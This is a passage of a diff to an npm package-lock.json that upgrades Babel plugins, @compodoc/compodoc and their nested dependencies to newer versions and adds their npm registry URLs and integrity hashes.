"sha512-oflKPvsLT2+uKQopesJt3ApiaIS2HW+hzHFcwRNtyDGieAeC/dIHZX8buJQ2J2X1rxGPy4eRcUijm3qcSPjYcA==", "dev": true, "requires": { - "@babel/helper-module-transforms": "^7.15.4", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-simple-access": "^7.15.4", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-simple-access": "^7.16.7", "babel-plugin-dynamic-import-node": "^2.3.3" } }, "@babel/plugin-transform-modules-systemjs": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.16.7.tgz", + "integrity": "sha512-DuK5E3k+QQmnOqBR9UkusByy5WZWGRxfzV529s9nPra1GE7olmxfqO2FHobEOYSPIjPBTr4p66YDcjQnt8cBmw==", "dev": true, "requires": { - "@babel/helper-hoist-variables": "^7.14.5", - "@babel/helper-module-transforms": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-validator-identifier": "^7.14.5", + "@babel/helper-hoist-variables": "^7.16.7", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-validator-identifier": "^7.16.7", "babel-plugin-dynamic-import-node": "^2.3.3" } }, "@babel/plugin-transform-modules-umd": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.16.7.tgz", + "integrity": "sha512-EMh7uolsC8O4xhudF2F6wedbSHm1HHZ0C6aJ7K67zcDNidMzVcxWdGr+htW9n21klm+bOn+Rx4CBsAntZd3rEQ==", "dev": true, "requires": { - "@babel/helper-module-transforms": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-named-capturing-groups-regex": { - "version": "7.14.9", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-named-capturing-groups-regex/-/plugin-transform-named-capturing-groups-regex-7.16.8.tgz", + "integrity": "sha512-j3Jw+n5PvpmhRR+mrgIh04puSANCk/T/UA3m3P1MjJkhlK906+ApHhDIqBQDdOgL/r1UYpz4GNclTXxyZrYGSw==", "dev": true, "requires": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7" } }, "@babel/plugin-transform-new-target": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.16.7.tgz", + "integrity": "sha512-xiLDzWNMfKoGOpc6t3U+etCE2yRnn3SM09BXqWPIZOBpL2gvVrBWUKnsJx0K/ADi5F5YC5f8APFfWrz25TdlGg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-object-super": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.16.7.tgz", + "integrity": "sha512-14J1feiQVWaGvRxj2WjyMuXS2jsBkgB3MdSN5HuC2G5nRspa5RK9COcs82Pwy5BuGcjb+fYaUj94mYcOj7rCvw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-replace-supers": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-replace-supers": "^7.16.7" } }, "@babel/plugin-transform-parameters": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.16.7.tgz", + "integrity": "sha512-AT3MufQ7zZEhU2hwOA11axBnExW0Lszu4RL/tAlUJBuNoRak+wehQW8h6KcXOcgjY42fHtDxswuMhMjFEuv/aw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-property-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-property-literals/-/plugin-transform-property-literals-7.16.7.tgz", + "integrity": "sha512-z4FGr9NMGdoIl1RqavCqGG+ZuYjfZ/hkCIeuH6Do7tXmSm0ls11nYVSJqFEUOSJbDab5wC6lRE/w6YjVcr6Hqw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-regenerator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.16.7.tgz", + "integrity": "sha512-mF7jOgGYCkSJagJ6XCujSQg+6xC1M77/03K2oBmVJWoFGNUtnVJO4WHKJk3dnPC8HCcj4xBQP1Egm8DWh3Pb3Q==", "dev": true, "requires": { "regenerator-transform": "^0.14.2" } }, "@babel/plugin-transform-reserved-words": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-reserved-words/-/plugin-transform-reserved-words-7.16.7.tgz", + "integrity": "sha512-KQzzDnZ9hWQBjwi5lpY5v9shmm6IVG0U9pB18zvMu2i4H90xpT4gmqwPYsn8rObiadYe2M0gmgsiOIF5A/2rtg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-runtime": { @@ -19445,54 +20091,68 @@ } }, "@babel/plugin-transform-shorthand-properties": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.16.7.tgz", + "integrity": "sha512-hah2+FEnoRoATdIb05IOXf+4GzXYTq75TVhIn1PewihbpyrNWUt2JbudKQOETWw6QpLe+AIUpJ5MVLYTQbeeUg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-spread": { - "version": "7.14.6", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-spread/-/plugin-transform-spread-7.16.7.tgz", + "integrity": "sha512-+pjJpgAngb53L0iaA5gU/1MLXJIfXcYepLgXB3esVRf4fqmj8f2cxM3/FKaHsZms08hFQJkFccEWuIpm429TXg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-skip-transparent-expression-wrappers": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.16.0" } }, "@babel/plugin-transform-sticky-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.16.7.tgz", + "integrity": "sha512-NJa0Bd/87QV5NZZzTuZG5BPJjLYadeSZ9fO6oOUoL4iQx+9EEuw/eEM92SrsT19Yc2jgB1u1hsjqDtH02c3Drw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-template-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.16.7.tgz", + "integrity": "sha512-VwbkDDUeenlIjmfNeDX/V0aWrQH2QiVyJtwymVQSzItFDTpxfyJh3EVaQiS0rIN/CqbLGr0VcGmuwyTdZtdIsA==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-typeof-symbol": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.16.7.tgz", + "integrity": "sha512-p2rOixCKRJzpg9JB4gjnG4gjWkWa89ZoYUnl9snJ1cWIcTH/hvxZqfO+WjG6T8DRBpctEol5jw1O5rA8gkCokQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-unicode-escapes": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-escapes/-/plugin-transform-unicode-escapes-7.16.7.tgz", + "integrity": "sha512-TAV5IGahIz3yZ9/Hfv35TV2xEm+kaBDaZQCn2S/hG9/CZ0DktxJv9eKfPc7yYCvOYR4JGx1h8C+jcSOvgaaI/Q==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-unicode-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.16.7.tgz", + "integrity": "sha512-oC5tYYKw56HO75KZVLQ+R/Nl3Hro9kf8iG0hXoaHP7tjAyCpvqBiSNe6vGrZni1Z6MggmUOC6A7VP7AVmw225Q==", "dev": true, "requires": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/preset-env": { @@ -19581,7 +20241,9 @@ } }, "@babel/preset-modules": { - "version": "0.1.4", + "version": "0.1.5", + "resolved": "https://registry.npmjs.org/@babel/preset-modules/-/preset-modules-0.1.5.tgz", + "integrity": "sha512-A57th6YRG7oR3cq/yt/Y84MvGgE0eJG2F1JLhKuyG+jFxEgrd/HAMJatiFtmOiZurz+0DkrvbheCLaV5f2JfjA==", "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.0.0", @@ -19607,23 +20269,28 @@ } }, "@babel/traverse": { - "version": "7.15.4", - "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.4", - "@babel/helper-function-name": "^7.15.4", - "@babel/helper-hoist-variables": "^7.15.4", - "@babel/helper-split-export-declaration": "^7.15.4", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.17.3.tgz", + "integrity": "sha512-5irClVky7TxRWIRtxlh2WPUUOLhcPN06AGgaQSB8AEwuyEBgJVuJ5imdHm5zxk8w0QS5T+tDfnDxAlhWjpb7cw==", + "requires": { + "@babel/code-frame": "^7.16.7", + "@babel/generator": "^7.17.3", + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-hoist-variables": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7", + "@babel/parser": "^7.17.3", + "@babel/types": "^7.17.0", "debug": "^4.1.0", "globals": "^11.1.0" }, "dependencies": { "@babel/generator": { - "version": "7.15.8", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.17.3.tgz", + "integrity": "sha512-+R6Dctil/MgUsZsZAkYgK+ADNSZzJRRy0TvY65T71z/CR854xHQ1EweBYXdfT+HNeN7w0cSJJEzgxZMv40pxsg==", "requires": { - "@babel/types": "^7.15.6", + "@babel/types": "^7.17.0", "jsesc": "^2.5.1", "source-map": "^0.5.0" } @@ -19638,136 +20305,212 @@ "version": "2.1.2" }, "source-map": { - "version": "0.5.7" + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=" } } }, "@babel/types": { - "version": "7.15.6", + "version": "7.17.0", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.17.0.tgz", + "integrity": "sha512-TmKSNO4D5rzhL5bjWFcVHHLETzfQ/AmbKpKPOSjlP0WoHZ6L911fgoOKY4Alp/emzG4cHJdyN49zpgkbXFEHHw==", "requires": { - "@babel/helper-validator-identifier": "^7.14.9", + "@babel/helper-validator-identifier": "^7.16.7", "to-fast-properties": "^2.0.0" } }, "@compodoc/compodoc": { - "version": "1.1.14", + "version": "1.1.18", + "resolved": "https://registry.npmjs.org/@compodoc/compodoc/-/compodoc-1.1.18.tgz", + "integrity": "sha512-+AFtcj2U3AJq6r8a2+PTdajIlS7m3pgvDhqgoYZJ4Rg/Zp9xvuDvUJU+5oHu8iHCAWwda3NoLUDjOZMNR8uIKg==", "dev": true, "requires": { - "@babel/core": "^7.14.6", - "@babel/preset-env": "^7.14.7", - "@compodoc/live-server": "^1.2.2", + "@angular-devkit/schematics": "^13.1.2", + "@babel/core": "^7.16.7", + "@babel/preset-env": "^7.16.7", + "@compodoc/live-server": "^1.2.3", "@compodoc/ngd-transformer": "^2.1.0", - "chalk": "^4.1.1", + "chalk": "^4.1.2", "cheerio": "^1.0.0-rc.10", "chokidar": "^3.5.2", - "colors": "^1.4.0", - "commander": "^8.0.0", - "cosmiconfig": "^7.0.0", - "decache": "^4.6.0", - "fancy-log": "^1.3.3", + "colors": "1.4.0", + "commander": "^8.3.0", + "cosmiconfig": "^7.0.1", + "decache": "^4.6.1", + "fancy-log": "^2.0.0", "findit2": "^2.2.3", "fs-extra": "^10.0.0", - "glob": "^7.1.7", + "glob": "^7.2.0", "handlebars": "^4.7.7", "html-entities": "^2.3.2", - "i18next": "^20.3.2", + "i18next": "^21.6.5", "inside": "^1.0.0", "json5": "^2.2.0", "lodash": "^4.17.21", - "loglevel": "^1.7.1", + "loglevel": "^1.8.0", "loglevel-plugin-prefix": "^0.8.4", "lunr": "^2.3.9", - "marked": "^2.1.3", + "marked": "^4.0.9", "minimist": "^1.2.5", "opencollective-postinstall": "^2.0.3", - "os-name": "^4.0.0", - "pdfmake": "^0.2.0", + "os-name": "4.0.1", + "pdfjs-dist": "^2.12.313", + "pdfmake": "^0.2.4", "semver": "^7.3.5", "traverse": "^0.6.6", - "ts-morph": "^11.0.3", + "ts-morph": "^13.0.2", "uuid": "^8.3.2" }, "dependencies": { - "@babel/compat-data": { - "version": "7.15.0", - "dev": true + "@ampproject/remapping": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.1.2.tgz", + "integrity": "sha512-hoyByceqwKirw7w3Z7gnIIZC3Wx3J484Y3L/cMpXFbr7d9ZQj2mODrirNzcJa+SM3UlpWXYvKV4RlRpFXlWgXg==", + "dev": true, + "requires": { + "@jridgewell/trace-mapping": "^0.3.0" + } + }, + "@angular-devkit/core": { + "version": "13.2.4", + "resolved": "https://registry.npmjs.org/@angular-devkit/core/-/core-13.2.4.tgz", + "integrity": "sha512-hSw1JWA/6dDAF/xleQRXGtzHphfU49TMUhvAoAmsmmz3NAn03xLy1dtqdIXIf+TkFXVvZDaAB2mW8KfRV67GFg==", + "dev": true, + "requires": { + "ajv": "8.9.0", + "ajv-formats": "2.1.1", + "fast-json-stable-stringify": "2.1.0", + "magic-string": "0.25.7", + "rxjs": "6.6.7", + "source-map": "0.7.3" + } + }, + "@angular-devkit/schematics": { + "version": "13.2.4", + "resolved": "https://registry.npmjs.org/@angular-devkit/schematics/-/schematics-13.2.4.tgz", + "integrity": "sha512-VMhYa4cDu5yE31OvHncAd15Rmlchih/Sr6sxFsIwkg4xzRNIIZCtwqxVXgf0TiTN9zrvlvzK7nhPqTGNqqYb2A==", + "dev": true, + "requires": { + "@angular-devkit/core": "13.2.4", + "jsonc-parser": "3.0.0", + "magic-string": "0.25.7", + "ora": "5.4.1", + "rxjs": "6.6.7" + } }, "@babel/core": { - "version": "7.15.0", - "dev": true, - "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-module-transforms": "^7.15.0", - "@babel/helpers": "^7.14.8", - "@babel/parser": "^7.15.0", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0", + "version": "7.17.5", + "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.17.5.tgz", + "integrity": "sha512-/BBMw4EvjmyquN5O+t5eh0+YqB3XXJkYD2cjKpYtWOfFy4lQ4UozNSmxAcWT8r2XtZs0ewG+zrfsqeR15i1ajA==", + "dev": true, + "requires": { + "@ampproject/remapping": "^2.1.0", + "@babel/code-frame": "^7.16.7", + "@babel/generator": "^7.17.3", + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helpers": "^7.17.2", + "@babel/parser": "^7.17.3", + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.17.3", + "@babel/types": "^7.17.0", "convert-source-map": "^1.7.0", "debug": "^4.1.0", "gensync": "^1.0.0-beta.2", "json5": "^2.1.2", - "semver": "^6.3.0", - "source-map": "^0.5.0" + "semver": "^6.3.0" }, "dependencies": { "semver": { "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", "dev": true } } }, "@babel/generator": { - "version": "7.15.0", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.17.3.tgz", + "integrity": "sha512-+R6Dctil/MgUsZsZAkYgK+ADNSZzJRRy0TvY65T71z/CR854xHQ1EweBYXdfT+HNeN7w0cSJJEzgxZMv40pxsg==", "dev": true, "requires": { - "@babel/types": "^7.15.0", + "@babel/types": "^7.17.0", "jsesc": "^2.5.1", "source-map": "^0.5.0" + }, + "dependencies": { + "source-map": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", + "dev": true + } } }, - "@babel/helper-compilation-targets": { - "version": "7.15.0", + "@babel/helper-define-polyfill-provider": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/@babel/helper-define-polyfill-provider/-/helper-define-polyfill-provider-0.3.1.tgz", + "integrity": "sha512-J9hGMpJQmtWmj46B3kBHmL38UhJGhYX7eqkcq+2gsstyYt341HmPeWspihX43yVRA0mS+8GGk2Gckc7bY/HCmA==", "dev": true, "requires": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", - "semver": "^6.3.0" + "@babel/helper-compilation-targets": "^7.13.0", + "@babel/helper-module-imports": "^7.12.13", + "@babel/helper-plugin-utils": "^7.13.0", + "@babel/traverse": "^7.13.0", + "debug": "^4.1.1", + "lodash.debounce": "^4.0.8", + "resolve": "^1.14.2", + "semver": "^6.1.2" }, "dependencies": { "semver": { "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", "dev": true } } }, - "@babel/preset-env": { - "version": "7.15.0", + "@babel/plugin-transform-async-to-generator": { + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.16.8.tgz", + "integrity": "sha512-MtmUmTJQHCnyJVrScNzNlofQJ3dLFuobYn3mwOTKHnSCMtbNsqvF71GQmJfFjdrXSsAA7iysFmYWw4bXZ20hOg==", "dev": true, "requires": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-validator-option": "^7.14.5", - "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": "^7.14.5", - "@babel/plugin-proposal-async-generator-functions": "^7.14.9", - "@babel/plugin-proposal-class-properties": "^7.14.5", - "@babel/plugin-proposal-class-static-block": "^7.14.5", - "@babel/plugin-proposal-dynamic-import": "^7.14.5", - "@babel/plugin-proposal-export-namespace-from": "^7.14.5", - "@babel/plugin-proposal-json-strings": "^7.14.5", - "@babel/plugin-proposal-logical-assignment-operators": "^7.14.5", - "@babel/plugin-proposal-nullish-coalescing-operator": "^7.14.5", - "@babel/plugin-proposal-numeric-separator": "^7.14.5", - "@babel/plugin-proposal-object-rest-spread": "^7.14.7", - "@babel/plugin-proposal-optional-catch-binding": "^7.14.5", - "@babel/plugin-proposal-optional-chaining": "^7.14.5", - "@babel/plugin-proposal-private-methods": "^7.14.5", - "@babel/plugin-proposal-private-property-in-object": "^7.14.5", - "@babel/plugin-proposal-unicode-property-regex": "^7.14.5", + "@babel/helper-module-imports": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-remap-async-to-generator": "^7.16.8" + } + }, + "@babel/preset-env": { + "version": "7.16.11", + "resolved": "https://registry.npmjs.org/@babel/preset-env/-/preset-env-7.16.11.tgz", + "integrity": "sha512-qcmWG8R7ZW6WBRPZK//y+E3Cli151B20W1Rv7ln27vuPaXU/8TKms6jFdiJtF7UDTxcrb7mZd88tAeK9LjdT8g==", + "dev": true, + "requires": { + "@babel/compat-data": "^7.16.8", + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-validator-option": "^7.16.7", + "@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": "^7.16.7", + "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": "^7.16.7", + "@babel/plugin-proposal-async-generator-functions": "^7.16.8", + "@babel/plugin-proposal-class-properties": "^7.16.7", + "@babel/plugin-proposal-class-static-block": "^7.16.7", + "@babel/plugin-proposal-dynamic-import": "^7.16.7", + "@babel/plugin-proposal-export-namespace-from": "^7.16.7", + "@babel/plugin-proposal-json-strings": "^7.16.7", + "@babel/plugin-proposal-logical-assignment-operators": "^7.16.7", + "@babel/plugin-proposal-nullish-coalescing-operator": "^7.16.7", + "@babel/plugin-proposal-numeric-separator": "^7.16.7", + "@babel/plugin-proposal-object-rest-spread": "^7.16.7", + "@babel/plugin-proposal-optional-catch-binding": "^7.16.7", + "@babel/plugin-proposal-optional-chaining": "^7.16.7", + "@babel/plugin-proposal-private-methods": "^7.16.11", + "@babel/plugin-proposal-private-property-in-object": "^7.16.7", + "@babel/plugin-proposal-unicode-property-regex": "^7.16.7", "@babel/plugin-syntax-async-generators": "^7.8.4", "@babel/plugin-syntax-class-properties": "^7.12.13", "@babel/plugin-syntax-class-static-block": "^7.14.5", @@ -19782,56 +20525,124 @@ "@babel/plugin-syntax-optional-chaining": "^7.8.3", "@babel/plugin-syntax-private-property-in-object": "^7.14.5", "@babel/plugin-syntax-top-level-await": "^7.14.5", - "@babel/plugin-transform-arrow-functions": "^7.14.5", - "@babel/plugin-transform-async-to-generator": "^7.14.5", - "@babel/plugin-transform-block-scoped-functions": "^7.14.5", - "@babel/plugin-transform-block-scoping": "^7.14.5", - "@babel/plugin-transform-classes": "^7.14.9", - "@babel/plugin-transform-computed-properties": "^7.14.5", - "@babel/plugin-transform-destructuring": "^7.14.7", - "@babel/plugin-transform-dotall-regex": "^7.14.5", - "@babel/plugin-transform-duplicate-keys": "^7.14.5", - "@babel/plugin-transform-exponentiation-operator": "^7.14.5", - "@babel/plugin-transform-for-of": "^7.14.5", - "@babel/plugin-transform-function-name": "^7.14.5", - "@babel/plugin-transform-literals": "^7.14.5", - "@babel/plugin-transform-member-expression-literals": "^7.14.5", - "@babel/plugin-transform-modules-amd": "^7.14.5", - "@babel/plugin-transform-modules-commonjs": "^7.15.0", - "@babel/plugin-transform-modules-systemjs": "^7.14.5", - "@babel/plugin-transform-modules-umd": "^7.14.5", - "@babel/plugin-transform-named-capturing-groups-regex": "^7.14.9", - "@babel/plugin-transform-new-target": "^7.14.5", - "@babel/plugin-transform-object-super": "^7.14.5", - "@babel/plugin-transform-parameters": "^7.14.5", - "@babel/plugin-transform-property-literals": "^7.14.5", - "@babel/plugin-transform-regenerator": "^7.14.5", - "@babel/plugin-transform-reserved-words": "^7.14.5", - "@babel/plugin-transform-shorthand-properties": "^7.14.5", - "@babel/plugin-transform-spread": "^7.14.6", - "@babel/plugin-transform-sticky-regex": "^7.14.5", - "@babel/plugin-transform-template-literals": "^7.14.5", - "@babel/plugin-transform-typeof-symbol": "^7.14.5", - "@babel/plugin-transform-unicode-escapes": "^7.14.5", - "@babel/plugin-transform-unicode-regex": "^7.14.5", - "@babel/preset-modules": "^0.1.4", - "@babel/types": "^7.15.0", - "babel-plugin-polyfill-corejs2": "^0.2.2", - "babel-plugin-polyfill-corejs3": "^0.2.2", - "babel-plugin-polyfill-regenerator": "^0.2.2", - "core-js-compat": "^3.16.0", + "@babel/plugin-transform-arrow-functions": "^7.16.7", + "@babel/plugin-transform-async-to-generator": "^7.16.8", + "@babel/plugin-transform-block-scoped-functions": "^7.16.7", + "@babel/plugin-transform-block-scoping": "^7.16.7", + "@babel/plugin-transform-classes": "^7.16.7", + "@babel/plugin-transform-computed-properties": "^7.16.7", + "@babel/plugin-transform-destructuring": "^7.16.7", + "@babel/plugin-transform-dotall-regex": "^7.16.7", + "@babel/plugin-transform-duplicate-keys": "^7.16.7", + "@babel/plugin-transform-exponentiation-operator": "^7.16.7", + "@babel/plugin-transform-for-of": "^7.16.7", + "@babel/plugin-transform-function-name": "^7.16.7", + "@babel/plugin-transform-literals": "^7.16.7", + "@babel/plugin-transform-member-expression-literals": "^7.16.7", + "@babel/plugin-transform-modules-amd": "^7.16.7", + "@babel/plugin-transform-modules-commonjs": "^7.16.8", + "@babel/plugin-transform-modules-systemjs": "^7.16.7", + "@babel/plugin-transform-modules-umd": "^7.16.7", + "@babel/plugin-transform-named-capturing-groups-regex": "^7.16.8", + "@babel/plugin-transform-new-target": "^7.16.7", + "@babel/plugin-transform-object-super": "^7.16.7", + "@babel/plugin-transform-parameters": "^7.16.7", + "@babel/plugin-transform-property-literals": "^7.16.7", + "@babel/plugin-transform-regenerator": "^7.16.7", + "@babel/plugin-transform-reserved-words": "^7.16.7", + "@babel/plugin-transform-shorthand-properties": "^7.16.7", + "@babel/plugin-transform-spread": "^7.16.7", + "@babel/plugin-transform-sticky-regex": "^7.16.7", + "@babel/plugin-transform-template-literals": "^7.16.7", + "@babel/plugin-transform-typeof-symbol": "^7.16.7", + "@babel/plugin-transform-unicode-escapes": "^7.16.7", + "@babel/plugin-transform-unicode-regex": "^7.16.7", + "@babel/preset-modules": "^0.1.5", + "@babel/types": "^7.16.8", + "babel-plugin-polyfill-corejs2": "^0.3.0", + "babel-plugin-polyfill-corejs3": "^0.5.0", + "babel-plugin-polyfill-regenerator": "^0.3.0", + "core-js-compat": "^3.20.2", "semver": "^6.3.0" }, "dependencies": { "semver": { "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", "dev": true } } }, - "caniuse-lite": { - "version": "1.0.30001251", - "dev": true + "@babel/template": { + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", + "dev": true, + "requires": { + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" + } + }, + "ajv": { + "version": "8.9.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.9.0.tgz", + "integrity": "sha512-qOKJyNj/h+OWx7s5DePL6Zu1KeM9jPZhwBqs+7DzP6bGOvqzVCSf0xueYmVuaC/oQ/VtS2zLMLHdQFbkka+XDQ==", + "dev": true, + "requires": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + } + }, + "ajv-formats": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/ajv-formats/-/ajv-formats-2.1.1.tgz", + "integrity": "sha512-Wx0Kx52hxE7C18hkMEggYlEifqWZtYaRgouJor+WMdPnQyEK13vgEWyVNup7SoeeoLMsr4kf5h6dOW11I15MUA==", + "dev": true, + "requires": { + "ajv": "^8.0.0" + } + }, + "babel-plugin-polyfill-corejs2": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs2/-/babel-plugin-polyfill-corejs2-0.3.1.tgz", + "integrity": "sha512-v7/T6EQcNfVLfcN2X8Lulb7DjprieyLWJK/zOWH5DUYcAgex9sP3h25Q+DLsX9TloXe3y1O8l2q2Jv9q8UVB9w==", + "dev": true, + "requires": { + "@babel/compat-data": "^7.13.11", + "@babel/helper-define-polyfill-provider": "^0.3.1", + "semver": "^6.1.1" + }, + "dependencies": { + "semver": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", + "dev": true + } + } + }, + "babel-plugin-polyfill-corejs3": { + "version": "0.5.2", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs3/-/babel-plugin-polyfill-corejs3-0.5.2.tgz", + "integrity": 